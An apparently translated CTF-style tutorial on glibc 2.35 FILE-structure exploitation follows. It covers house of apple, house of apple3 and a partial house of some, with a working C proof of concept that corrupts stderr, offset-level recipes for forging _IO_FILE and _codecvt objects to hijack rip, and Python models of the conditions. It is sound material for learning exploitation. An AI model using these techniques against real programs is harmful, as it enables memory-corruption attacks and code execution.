    _IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)
    {
    if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))
    free (f->_wide_data->_IO_buf_base); // 其不为0的时候不要执行到这里
    f->_wide_data->_IO_buf_base = b;
    f->_wide_data->_IO_buf_end = eb;
    if (a)
    f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;
    else
    f->_flags2 |= _IO_FLAGS2_USER_WBUF;
    }

demo

// glibc 2.35-0ubuntu3
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>
#include<unistd.h>
#include <string.h>

int main(void)
{
    setbuf(stdout, 0);
    setbuf(stdin, 0);
    setvbuf(stderr, 0, 2, 0);
    puts("[*] allocate a 0x100 chunk");
    size_t *p1 = malloc(0xf0);
    size_t *tmp = p1;
    size_t old_value = 0x1122334455667788;
    for (size_t i = 0; i < 0x100 / 8; i++)
    {
        p1[i] = old_value;
    }
    puts("===========================old value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================old value=======================");
    size_t puts_addr = (size_t)&puts;
    printf("[*] puts address: %p\n", (void *)puts_addr);
    size_t stderr_write_ptr_addr = puts_addr + 0x1997f8;
    printf("[*] stderr->_IO_write_ptr address: %p\n", (void *)stderr_write_ptr_addr);
    size_t stderr_flags2_addr = puts_addr + 0x199844;
    printf("[*] stderr->_flags2 address: %p\n", (void *)stderr_flags2_addr);
    size_t stderr_wide_data_addr = puts_addr + 0x199870;
    printf("[*] stderr->_wide_data address: %p\n", (void *)stderr_wide_data_addr);
    size_t sdterr_vtable_addr = puts_addr + 0x1998a8;
    printf("[*] stderr->vtable address: %p\n", (void *)sdterr_vtable_addr);
    size_t _IO_wstrn_jumps_addr = puts_addr + 0x194ef0;
    printf("[*] _IO_wstrn_jumps address: %p\n", (void *)_IO_wstrn_jumps_addr);
    puts("[+] step 1: change stderr->_IO_write_ptr to -1");
    *(size_t *)stderr_write_ptr_addr = (size_t)-1;
    puts("[+] step 2: change stderr->_flags2 to 8");
    *(size_t *)stderr_flags2_addr = 8;
    puts("[+] step 3: replace stderr->_wide_data with the allocated chunk");
    *(size_t *)stderr_wide_data_addr = (size_t)p1;
    puts("[+] step 4: replace stderr->vtable with _IO_wstrn_jumps");
    *(size_t *)sdterr_vtable_addr = (size_t)_IO_wstrn_jumps_addr;
    puts("[+] step 5: call fcloseall and trigger house of apple");
    fcloseall();
    tmp = p1;
    puts("===========================new value=======================");
    for (size_t i = 0; i < 4; i++)
    {
        printf("[%p]: 0x%016lx  0x%016lx\n", tmp, tmp[0], tmp[1]);
        tmp += 2;
    }
    puts("===========================new value=======================");
}
Output:
[*] allocate a 0x100 chunk
===========================old value=======================
[0x56142e11b2a0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2b0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2c0]: 0x1122334455667788 0x1122334455667788
[0x56142e11b2d0]: 0x1122334455667788 0x1122334455667788
===========================old value=======================
[*] puts address: 0x7cb7d0280ed0
[*] stderr->_IO_write_ptr address: 0x7cb7d041a6c8
[*] stderr->_flags2 address: 0x7cb7d041a714
[*] stderr->_wide_data address: 0x7cb7d041a740
[*] stderr->vtable address: 0x7cb7d041a778
[*] _IO_wstrn_jumps address: 0x7cb7d0415dc0
[+] step 1: change stderr->_IO_write_ptr to -1
[+] step 2: change stderr->_flags2 to 8
[+] step 3: replace stderr->_wide_data with the allocated chunk
[+] step 4: replace stderr->vtable with _IO_wstrn_jumps
[+] step 5: call fcloseall and trigger house of apple
===========================new value=======================
[0x56142e11b2a0]: 0x00007cb7d041a790 0x00007cb7d041a890
[0x56142e11b2b0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2c0]: 0x00007cb7d041a790 0x00007cb7d041a790
[0x56142e11b2d0]: 0x00007cb7d041a790 0x00007cb7d041a890
===========================new value=======================
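The new values can be reproduced by hand. Here is a short Python sketch. It assumes, as in glibc 2.35, that `overflow_buf` sits at A + 0xf0 and holds 64 `wchar_t` of 4 bytes each. A is the address of stderr, which the demo shows indirectly as the `_IO_write_ptr` address minus 0x28. `wstrn_overflow_effect` is a hypothetical helper name.

```python
def wstrn_overflow_effect(a: int) -> dict:
    """Qwords that _IO_wstrn_overflow writes into B = fp->_wide_data (offset -> value).

    Assumes the first branch is taken (B->_IO_buf_base != overflow_buf).
    """
    buf = a + 0xF0            # snf->overflow_buf
    end = buf + 64 * 4        # overflow_buf + sizeof(overflow_buf) / sizeof(wchar_t)
    return {
        0x00: buf,   # _IO_read_ptr
        0x08: end,   # _IO_read_end
        0x10: buf,   # _IO_read_base
        0x18: buf,   # _IO_write_base
        0x20: buf,   # _IO_write_ptr
        0x28: buf,   # _IO_write_end
        0x30: buf,   # _IO_buf_base (set by _IO_wsetb)
        0x38: end,   # _IO_buf_end  (set by _IO_wsetb)
    }
```

With A = 0x7cb7d041a6a0 this gives 0x7cb7d041a790 and 0x7cb7d041a890 in the same pattern as the four rows of the new dump.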

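Summary: given only a single largebin attack, _IO_wstrn_overflow can overwrite the values in an arbitrary address range with a known address, usually a heap address. By forging two or even more _IO_FILE structures and linking them through the _chain field, these writes can be combined.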

Overwriting the tcache thread variable (< 2.37)

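  • Forge at least two _IO_FILE structures
  • When the first _IO_FILE executes _IO_OVERFLOW, use _IO_wstrn_overflow to set the tcache variable to a known value, which gives control over tcache bin allocation
  • When the second _IO_FILE executes _IO_OVERFLOW, use the malloc in _IO_str_overflow to allocate at an arbitrary address, and its memcpy to write arbitrary values there
  • Use two such arbitrary writes to modify pointer_guard and IO_accept_foreign_vtables so that the _IO_vtable_check check passes. Alternatively, use one arbitrary write to overwrite a function address in libc.got: many IO functions call strlen/strcpy/memcpy/memset, which go through libc.got
  • Finally, use one more _IO_FILE with a freely forged vtable to hijack control flow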

Overwriting the mp_ structure

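  • Forge at least two _IO_FILE structures
  • When the first _IO_FILE executes _IO_OVERFLOW, use _IO_wstrn_overflow to set mp_.tcache_bins to a very large value, so that even very large chunks are managed through tcache bins
  • The rest of the process is the same as above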

Overwriting the pointer_guard thread variable + house of emma

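  • Forge two _IO_FILE structures
  • When the first _IO_FILE executes _IO_OVERFLOW, use _IO_wstrn_overflow to set pointer_guard in the TLS structure to a known value
  • Use the second _IO_FILE for house of emma, which gives control of the execution flow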

Overwriting the global variable global_max_fast

After overwriting this variable, free a very large chunk directly to overwrite pointer_guard or the tcache variable.

house of apple3

The FILE structure has a member struct _IO_codecvt *_codecvt; at offset 0x98. This structure takes part in wide-character conversion. The related definitions are:

struct _IO_codecvt
{
_IO_iconv_t __cd_in;
_IO_iconv_t __cd_out;
};

typedef struct
{
struct __gconv_step *step;
struct __gconv_step_data step_data;
} _IO_iconv_t;

struct __gconv_step
{
struct __gconv_loaded_object *__shlib_handle;
const char *__modname;

/* For internal use by glibc. (Accesses to this member must occur
when the internal __gconv_lock mutex is acquired). */
int __counter;

char *__from_name;
char *__to_name;

__gconv_fct __fct;
__gconv_btowc_fct __btowc_fct;
__gconv_init_fct __init_fct;
__gconv_end_fct __end_fct;

/* Information about the number of bytes needed or produced in this
step. This helps optimizing the buffer sizes. */
int __min_needed_from;
int __max_needed_from;
int __min_needed_to;
int __max_needed_to;

/* Flag whether this is a stateful encoding or not. */
int __stateful;

void *__data; /* Pointer to step-local data. */
};

struct __gconv_step_data
{
unsigned char *__outbuf; /* Output buffer for this step. */
unsigned char *__outbufend; /* Address of first byte after the output
buffer. */

/* Is this the last module in the chain. */
int __flags;

/* Counter for number of invocations of the module function for this
descriptor. */
int __invocation_counter;

/* Flag whether this is an internal use of the module (in the mb*towc*
and wc*tomb* functions) or regular with iconv(3). */
int __internal_use;

__mbstate_t *__statep;
__mbstate_t __state; /* This element must not be used directly by
any module; always use STATEP! */
};
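The offsets that the exploitation conditions rely on (for example __fct at +0x28 and __stateful at +0x58 in __gconv_step) can be double-checked by mirroring these structures with Python's ctypes. This sketch assumes an LP64 target such as x86-64 Linux. The class names are made up, the leading underscores of the glibc field names are dropped, and the union inside __mbstate_t is modelled as a single 4-byte field.

```python
from ctypes import Structure, c_int, c_uint, c_void_p, sizeof


class MbState(Structure):              # __mbstate_t: int __count; 4-byte union __value
    _fields_ = [("count", c_int), ("value", c_uint)]


class GconvStepData(Structure):        # struct __gconv_step_data
    _fields_ = [("outbuf", c_void_p), ("outbufend", c_void_p),
                ("flags", c_int), ("invocation_counter", c_int),
                ("internal_use", c_int), ("statep", c_void_p),
                ("state", MbState)]


class GconvStep(Structure):            # struct __gconv_step
    _fields_ = [("shlib_handle", c_void_p), ("modname", c_void_p),
                ("counter", c_int), ("from_name", c_void_p),
                ("to_name", c_void_p), ("fct", c_void_p),
                ("btowc_fct", c_void_p), ("init_fct", c_void_p),
                ("end_fct", c_void_p), ("min_needed_from", c_int),
                ("max_needed_from", c_int), ("min_needed_to", c_int),
                ("max_needed_to", c_int), ("stateful", c_int),
                ("data", c_void_p)]


class IconvT(Structure):               # _IO_iconv_t
    _fields_ = [("step", c_void_p), ("step_data", GconvStepData)]


class IOCodecvt(Structure):            # struct _IO_codecvt
    _fields_ = [("cd_in", IconvT), ("cd_out", IconvT)]


for cls, field in [(GconvStep, "fct"), (GconvStep, "stateful"), (IOCodecvt, "cd_out")]:
    print(cls.__name__, field, hex(getattr(cls, field).offset))
```

On x86-64 this prints 0x28, 0x58 and 0x38. So __cd_out.step sits at B + 0x38 when B is the fake _codecvt.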
house of apple3 focuses on three functions: __libio_codecvt_out, __libio_codecvt_in and __libio_codecvt_length. All three are exploited in much the same way. Taking __libio_codecvt_in as an example, the source is analysed below:
enum __codecvt_result
__libio_codecvt_in (struct _IO_codecvt *codecvt, __mbstate_t *statep,
const char *from_start, const char *from_end,
const char **from_stop,
wchar_t *to_start, wchar_t *to_end, wchar_t **to_stop)
{
enum __codecvt_result result;
// gs comes from the first argument
struct __gconv_step *gs = codecvt->__cd_in.step;
int status;
size_t dummy;
const unsigned char *from_start_copy = (unsigned char *) from_start;

codecvt->__cd_in.step_data.__outbuf = (unsigned char *) to_start;
codecvt->__cd_in.step_data.__outbufend = (unsigned char *) to_end;
codecvt->__cd_in.step_data.__statep = statep;

__gconv_fct fct = gs->__fct;
#ifdef PTR_DEMANGLE
// if gs->__shlib_handle is non-NULL, fct is demangled with __pointer_guard
// if it is controllable, setting it to NULL skips the demangling
if (gs->__shlib_handle != NULL)
PTR_DEMANGLE (fct);
#endif
// function-pointer call here
// this macro simply calls fct(gs, ...)
status = DL_CALL_FCT (fct,
(gs, &codecvt->__cd_in.step_data, &from_start_copy,
(const unsigned char *) from_end, NULL,
&dummy, 0, 0));
// ......
}
Here __gconv_fct and DL_CALL_FCT are defined as:
/* Type of a conversion function.  */
typedef int (*__gconv_fct) (struct __gconv_step *, struct __gconv_step_data *,
const unsigned char **, const unsigned char *,
unsigned char **, size_t *, int, int);

#ifndef DL_CALL_FCT
# define DL_CALL_FCT(fct, args) fct args
#endif
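The decision made in __libio_codecvt_in can be modelled in a few lines of Python. This sketch assumes memory is given as a dict mapping address to qword. It also assumes PTR_DEMANGLE is the x86-64 variant: rotate right by 0x11, then xor with pointer_guard. `codecvt_in_call` and `ptr_demangle` are hypothetical names. The function returns the call target together with rdi and rsi.

```python
MASK64 = (1 << 64) - 1


def ror64(v: int, r: int) -> int:
    """Rotate a 64-bit value right by r bits."""
    return ((v >> r) | (v << (64 - r))) & MASK64


def ptr_demangle(v: int, guard: int) -> int:
    """x86-64 PTR_DEMANGLE: ror by 0x11, then xor with pointer_guard."""
    return ror64(v, 0x11) ^ guard


def codecvt_in_call(mem: dict, codecvt: int, guard: int = 0):
    """Return (rip, rdi, rsi) for the DL_CALL_FCT in __libio_codecvt_in."""
    gs = mem[codecvt]                  # codecvt->__cd_in.step
    fct = mem[gs + 0x28]               # gs->__fct
    if mem[gs] != 0:                   # gs->__shlib_handle != NULL -> PTR_DEMANGLE
        fct = ptr_demangle(fct, guard)
    return fct, gs, codecvt + 0x8      # rdi = gs, rsi = &codecvt->__cd_in.step_data
```

With __shlib_handle left at 0, whatever is stored at gs + 0x28 is called as-is. Otherwise the stored value has to be pre-mangled with the unknown pointer_guard.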
_IO_wfile_underflow

  • Call chain
  1. _IO_wfile_underflow

    wint_t
    _IO_wfile_underflow (FILE *fp)
    {
    struct _IO_codecvt *cd;
    enum __codecvt_result status;
    ssize_t count;

    /* C99 requires EOF to be "sticky". */

    // must not enter this branch
    if (fp->_flags & _IO_EOF_SEEN)
    return WEOF;
    // must not enter this branch
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // must not enter this branch
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    // must enter this branch
    /* Maybe there is something left in the external buffer. */
    if (fp->_IO_read_ptr < fp->_IO_read_end)
    {
    /* There is more in the external. Convert it. */
    const char *read_stop = (const char *) fp->_IO_read_ptr;

    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;
    // execution must get all the way here
    status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    // ......
    }
    }

  2. __libio_codecvt_in

  3. DL_CALL_FCT

  4. gs = fp->_codecvt->__cd_in.step

  5. *(gs->__fct)(gs)

In summary:
  • Set _flags to ~(4 | 0x10)
  • Set vtable to the address of _IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap (plus or minus an offset) so that _IO_wfile_underflow gets called
  • fp->_IO_read_ptr < fp->_IO_read_end, i.e. *(fp + 8) < *(fp + 0x10)
  • Leave _wide_data at its default, or set it to a controlled heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8)
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0
  • Set codecvt->__cd_in.step->__fct to an address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well
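Here is a Python sketch that lays out the fake objects from this summary and then replays the branch checks of _IO_wfile_underflow on them. It assumes fp, A, B and C share one buffer at a known `base`; that placement is chosen only for illustration. `build` and `reaches_fct` are hypothetical names, and locking is ignored.

```python
import struct

OFF_A, OFF_B, OFF_C = 0xE0, 0x1D0, 0x240   # A: _wide_data, B: _codecvt, C: __gconv_step


def put(buf: bytearray, off: int, val: int) -> None:
    struct.pack_into("<Q", buf, off, val)


def get(buf: bytes, off: int) -> int:
    return struct.unpack_from("<Q", buf, off)[0]


def build(base: int, vtable: int, target: int) -> bytes:
    buf = bytearray(0x2A8)
    struct.pack_into("<I", buf, 0x00, 0)       # _flags: neither _IO_NO_READS (4) nor _IO_EOF_SEEN (0x10)
    put(buf, 0x08, 0)                          # fp->_IO_read_ptr ...
    put(buf, 0x10, 1)                          # ... < fp->_IO_read_end
    put(buf, 0x98, base + OFF_B)               # _codecvt = B
    put(buf, 0xA0, base + OFF_A)               # _wide_data = A (its read_ptr/read_end stay 0)
    put(buf, 0xD8, vtable)
    put(buf, OFF_B, base + OFF_C)              # B->__cd_in.step = C
    put(buf, OFF_C, 0)                         # C->__shlib_handle = NULL
    put(buf, OFF_C + 0x28, target)             # C->__fct = D
    return bytes(buf)


def reaches_fct(buf: bytes, base: int):
    """Replay _IO_wfile_underflow's checks; return (rip, rdi) or None."""
    flags = struct.unpack_from("<I", buf, 0)[0]
    if flags & (0x4 | 0x10):
        return None
    a = get(buf, 0xA0) - base
    if get(buf, a) < get(buf, a + 8):          # wide read_ptr < wide read_end: early return
        return None
    if not get(buf, 0x08) < get(buf, 0x10):    # nothing left in the external buffer
        return None
    c = get(buf, get(buf, 0x98) - base) - base
    if get(buf, c) != 0:                       # __fct would be demangled
        return None
    return get(buf, c + 0x28), base + c
```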

_IO_wfile_underflow_mmap

  • Call chain
  1. _IO_wfile_underflow_mmap
    static wint_t
    _IO_wfile_underflow_mmap (FILE *fp)
    {
    struct _IO_codecvt *cd;
    const char *read_stop;
    // must not enter this branch
    if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
    {
    fp->_flags |= _IO_ERR_SEEN;
    __set_errno (EBADF);
    return WEOF;
    }
    // must not enter this branch
    if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
    return *fp->_wide_data->_IO_read_ptr;

    cd = fp->_codecvt;

    /* Maybe there is something left in the external buffer. */
    // better not to enter this branch
    if (fp->_IO_read_ptr >= fp->_IO_read_end
    /* No. But maybe the read buffer is not fully set up. */
    && _IO_file_underflow_mmap (fp) == EOF)
    /* Nothing available. _IO_file_underflow_mmap has set the EOF or error
    flags as appropriate. */
    return WEOF;

    /* There is more in the external. Convert it. */
    read_stop = (const char *) fp->_IO_read_ptr;

    // better not to enter this branch
    if (fp->_wide_data->_IO_buf_base == NULL)
    {
    /* Maybe we already have a push back pointer. */
    if (fp->_wide_data->_IO_save_base != NULL)
    {
    free (fp->_wide_data->_IO_save_base);
    fp->_flags &= ~_IO_IN_BACKUP;
    }
    _IO_wdoallocbuf (fp); // this call is the target in house of apple2; here _IO_buf_base != NULL, so the branch is skipped
    }
    fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
    fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
    fp->_wide_data->_IO_buf_base;

    // execution must reach this call
    __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
    fp->_IO_read_ptr, fp->_IO_read_end,
    &read_stop,
    fp->_wide_data->_IO_read_ptr,
    fp->_wide_data->_IO_buf_end,
    &fp->_wide_data->_IO_read_end);
    //......
    }
    Conditions:
  • fp->_flags & _IO_NO_READS == 0
  • fp->_wide_data->_IO_read_ptr >= fp->_wide_data->_IO_read_end
  • fp->_IO_read_ptr < fp->_IO_read_end
  • fp->_wide_data->_IO_buf_base != NULL
  1. __libio_codecvt_in

  2. DL_CALL_FCT

  3. gs = fp->_codecvt->__cd_in.step

  4. *(gs->__fct)(gs)

In summary:
  • Set _flags to ~4
  • Set vtable to the address of _IO_wfile_jumps_mmap (plus or minus an offset) so that _IO_wfile_underflow_mmap gets called
  • fp->_IO_read_ptr < fp->_IO_read_end, i.e. *(fp + 8) < *(fp + 0x10)
  • Leave _wide_data at its default, or set it to a controlled heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_read_ptr >= _wide_data->_IO_read_end, i.e. *A >= *(A + 8)
  • Set _wide_data->_IO_buf_base to non-zero, i.e. *(A + 0x30) != 0
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0
  • Set codecvt->__cd_in.step->__fct to an address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well
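Compared with _IO_wfile_underflow, the mmap variant adds the requirement that _wide_data->_IO_buf_base is non-NULL. Below is a compact Python predicate over a dict of field values. It is a sketch; the key names are illustrative and are not glibc identifiers.

```python
def wfile_underflow_mmap_ok(f: dict) -> bool:
    """Branch replay of _IO_wfile_underflow_mmap up to the __libio_codecvt_in call."""
    if f["_flags"] & 0x4:                        # _IO_NO_READS -> WEOF
        return False
    if f["w_read_ptr"] < f["w_read_end"]:        # returns the buffered wide char
        return False
    if f["read_ptr"] >= f["read_end"]:           # avoided: depends on _IO_file_underflow_mmap
        return False
    if f["w_buf_base"] == 0:                     # avoided: free() / _IO_wdoallocbuf path
        return False
    return f["step_shlib_handle"] == 0           # __fct is then called without PTR_DEMANGLE
```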

_IO_wdo_write

  • Call chain
  1. _IO_new_file_sync
    int
    _IO_new_file_sync (FILE *fp)
    {
    ssize_t delta;
    int retval = 0;

    /* char* ptr = cur_ptr(); */
    if (fp->_IO_write_ptr > fp->_IO_write_base)
    if (_IO_do_flush(fp)) return EOF; // reached here
    //......
    }
    Conditions:
  • fp->_IO_write_ptr > fp->_IO_write_base
  1. _IO_do_flush
    #define _IO_do_flush(_f) \
    ((_f)->_mode <= 0 \
    ? _IO_do_write(_f, (_f)->_IO_write_base, \
    (_f)->_IO_write_ptr-(_f)->_IO_write_base) \
    : _IO_wdo_write(_f, (_f)->_wide_data->_IO_write_base, \
    ((_f)->_wide_data->_IO_write_ptr \
    - (_f)->_wide_data->_IO_write_base)))
    Conditions:
  • fp->_mode > 0
  • the second argument is then fp->_wide_data->_IO_write_base
  • the third argument is fp->_wide_data->_IO_write_ptr - fp->_wide_data->_IO_write_base
  1. _IO_wdo_write
    int
    _IO_wdo_write (FILE *fp, const wchar_t *data, size_t to_do)
    {
    struct _IO_codecvt *cc = fp->_codecvt;

    // the third argument must be greater than 0
    if (to_do > 0)
    {
    if (fp->_IO_write_end == fp->_IO_write_ptr
    && fp->_IO_write_end != fp->_IO_write_base)
    { // must not enter this branch
    if (_IO_new_do_write (fp, fp->_IO_write_base,
    fp->_IO_write_ptr - fp->_IO_write_base) == EOF)
    return WEOF;
    }

    // ......

    /* Now convert from the internal format into the external buffer. */
    // execution must reach this call
    result = __libio_codecvt_out (cc, &fp->_wide_data->_IO_state,
    data, data + to_do, &new_data,
    write_ptr,
    buf_end,
    &write_ptr);
    //......
    }
    }
    Conditions:
  • fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base
  • fp->_IO_write_end == fp->_IO_write_ptr && fp->_IO_write_end != fp->_IO_write_base must be false
  1. __libio_codecvt_out

  2. DL_CALL_FCT

  3. gs = fp->_codecvt->__cd_out.step

  4. *(gs->__fct)(gs)

In summary:
  • Set _flags to ~4
  • Set vtable to the address of _IO_file_jumps (plus or minus an offset) so that _IO_new_file_sync gets called
  • _mode > 0, i.e. *(fp + 0xc0) > 0
  • _IO_write_ptr > _IO_write_base, i.e. *(fp + 0x28) > *(fp + 0x20)
  • _IO_write_end != _IO_write_ptr or _IO_write_end == _IO_write_base, i.e. *(fp + 0x30) != *(fp + 0x28) or *(fp + 0x30) == *(fp + 0x20)
  • Set _wide_data to a heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_write_ptr > _wide_data->_IO_write_base, i.e. *(A + 0x20) > *(A + 0x18)
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B
  • Set codecvt->__cd_out.step to a controlled heap address C, i.e. *(B + 0x38) = C
  • Set codecvt->__cd_out.step->__shlib_handle to 0, i.e. *C = 0
  • Set codecvt->__cd_out.step->__fct to an address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C. If _wide_data is also controllable, rsi can be controlled as well
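Here is a Python model of the branch decisions from _IO_new_file_sync down to __libio_codecvt_out. It assumes field values are passed in a dict with illustrative key names. One detail to keep in mind: _IO_do_flush passes a wchar_t pointer difference. On Linux, where wchar_t is 4 bytes, the wide write gap should therefore be a multiple of 4 and at least 4 bytes. In this model a gap of 1 to 3 bytes gives to_do == 0.

```python
MASK64 = (1 << 64) - 1


def wdo_write_path(f: dict) -> str:
    """Name the branch reached via _IO_new_file_sync -> _IO_do_flush -> _IO_wdo_write."""
    if not f["write_ptr"] > f["write_base"]:
        return "no flush"                          # _IO_new_file_sync skips _IO_do_flush
    if f["_mode"] <= 0:
        return "_IO_do_write"                      # narrow path, not the one we want
    # wchar_t* difference (4-byte units), then passed as size_t
    to_do = ((f["w_write_ptr"] - f["w_write_base"]) >> 2) & MASK64
    if to_do == 0:
        return "nothing to convert"
    if f["write_end"] == f["write_ptr"] and f["write_end"] != f["write_base"]:
        return "_IO_new_do_write"                  # narrow buffer flushed first: avoid
    return "__libio_codecvt_out"
```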

_IO_wfile_sync

  • Call chain
  1. _IO_wfile_sync
    wint_t
    _IO_wfile_sync (FILE *fp)
    {
    ssize_t delta;
    wint_t retval = 0;

    /* char* ptr = cur_ptr(); */
    // do not enter this branch
    if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if (_IO_do_flush (fp))
    return WEOF;
    delta = fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end;
    // must enter this branch
    if (delta != 0)
    {
    /* We have to find out how many bytes we have to go back in the
    external buffer. */
    struct _IO_codecvt *cv = fp->_codecvt;
    off64_t new_pos;

    // returning -1 here is enough
    int clen = __libio_codecvt_encoding (cv);

    if (clen > 0)
    /* It is easy, a fixed number of input bytes are used for each
    wide character. */
    delta *= clen;
    else
    {
    /* We have to find out the hard way how much to back off.
    To do this we determine how much input we needed to
    generate the wide characters up to the current reading
    position. */
    int nread;
    size_t wnread = (fp->_wide_data->_IO_read_ptr
    - fp->_wide_data->_IO_read_base);
    fp->_wide_data->_IO_state = fp->_wide_data->_IO_last_state;
    // reached here
    nread = __libio_codecvt_length (cv, &fp->_wide_data->_IO_state,
    fp->_IO_read_base,
    fp->_IO_read_end, wnread);
    // ......

    }
    }
    }
    Conditions:
  • fp->_wide_data->_IO_write_ptr <= fp->_wide_data->_IO_write_base
  • fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end != 0
  • clen <= 0
    int
    __libio_codecvt_encoding (struct _IO_codecvt *codecvt)
    {
    /* See whether the encoding is stateful. */
    if (codecvt->__cd_in.step->__stateful)
    return -1;
    /* Fortunately not. Now determine the input bytes for the conversion
    necessary for each wide character. */
    if (codecvt->__cd_in.step->__min_needed_from
    != codecvt->__cd_in.step->__max_needed_from)
    /* Not a constant value. */
    return 0;

    return codecvt->__cd_in.step->__min_needed_from;
    }
  • fp->_codecvt->__cd_in.step->__stateful != 0
  1. __libio_codecvt_length

  2. DL_CALL_FCT

  3. gs = fp->_codecvt->__cd_in.step

  4. *(gs->__fct)(gs)

In summary:
  • Set _flags to ~(4 | 0x10)
  • Set vtable to the address of _IO_wfile_jumps (plus or minus an offset) so that _IO_wfile_sync gets called
  • Set _wide_data to a heap address A, i.e. *(fp + 0xa0) = A
  • _wide_data->_IO_write_ptr <= _wide_data->_IO_write_base, i.e. *(A + 0x20) <= *(A + 0x18)
  • _wide_data->_IO_read_ptr != _wide_data->_IO_read_end, i.e. *A != *(A + 8)
  • Set _codecvt to a controlled heap address B, i.e. *(fp + 0x98) = B
  • Set codecvt->__cd_in.step to a controlled heap address C, i.e. *B = C
  • Set codecvt->__cd_in.step->__stateful to non-zero, i.e. *(C + 0x58) != 0
  • Set codecvt->__cd_in.step->__shlib_handle to 0, i.e. *C = 0
  • Set codecvt->__cd_in.step->__fct to an address D used to control rip, i.e. *(C + 0x28) = D. When D is called, rdi is C and rsi is &codecvt->__cd_in.step_data (B + 8), which is also controllable
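Here is a Python sketch of the two decisions in _IO_wfile_sync that matter for this chain. `codecvt_encoding` mirrors __libio_codecvt_encoding above. `wfile_sync_reaches_length` is a hypothetical name; it checks whether execution gets as far as __libio_codecvt_length. Field values are passed as dicts with illustrative keys.

```python
def codecvt_encoding(step: dict) -> int:
    """Mirror of __libio_codecvt_encoding for a fake __gconv_step."""
    if step["stateful"]:
        return -1
    if step["min_needed_from"] != step["max_needed_from"]:
        return 0
    return step["min_needed_from"]


def wfile_sync_reaches_length(w: dict, step: dict) -> bool:
    """Does _IO_wfile_sync get to __libio_codecvt_length? `w` holds _wide_data fields."""
    if w["write_ptr"] > w["write_base"]:          # would take the _IO_do_flush branch
        return False
    if w["read_ptr"] - w["read_end"] == 0:        # delta == 0: nothing to give back
        return False
    return codecvt_encoding(step) <= 0            # clen > 0 takes the easy path
```

Setting __stateful is the simplest option. In this model, a non-stateful step with __min_needed_from != __max_needed_from also gives clen == 0.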

house of some(house of apple2 plus)

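  • Requirements
    1. The glibc base address is known
    2. A controllable region at a known address (to write a fake_IO_file into)
    3. One arbitrary write of a controllable address somewhere inside libc
    4. The program exits normally or through exit()
  • Advantages:
    1. Unaffected by the current IO_validate_vtable check (it still works even if the wide_data vtable gets a check as well)
    2. The requirements on the first arbitrary write are low
    3. The final privilege-escalation step is ROP on the stack, so no stack pivot is needed
    4. A source-level attack that does not depend on compilation results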

The technique abuses the function _IO_new_file_underflow:

int  
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

